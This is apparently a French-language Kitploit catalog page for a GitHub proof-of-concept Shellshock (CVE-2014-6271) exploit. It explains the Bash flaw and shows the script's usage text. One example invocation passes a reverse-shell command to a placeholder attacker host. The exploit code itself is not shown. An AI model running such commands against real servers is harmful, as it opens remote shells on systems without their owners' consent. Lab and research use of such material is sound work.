Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-6271-Shellshock — Exploit CVE-2014-6271 | par infrar3d | Kitploit
Outils/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

Exploit CVE-2014-6271 | par infrar3d

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2014-6271 Shellshock

exploité par infrar3d

Ce dépôt contient une preuve de concept d'exploit pour CVE-2014-6271 (Shellshock).

Shellshock est une vulnérabilité critique dans GNU Bash où des variables d'environnement spécialement conçues permettent l'exécution arbitraire de commandes.
Lorsqu'un serveur web transmet des en-têtes HTTP à des scripts CGI qui invoquent Bash, un attaquant peut injecter des commandes via ces en-têtes.

Utilisation :

./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

Exemples :

./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(testé sur la machine VulnHub "Hacksudo - Thor")

⚠️ Avertissement ⚠️

Ce logiciel et ce code de preuve de concept sont fournis uniquement à des fins éducatives et de recherche.

  • Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce programme.
  • Ne pas utiliser contre des systèmes sans autorisation préalable explicite.
  • L'utilisation de ces outils pour attaquer des cibles sans consentement est illégale.

Vous êtes responsable du respect de toutes les lois applicables. Utilisez de manière éthique et responsable.

Télécharger l’outil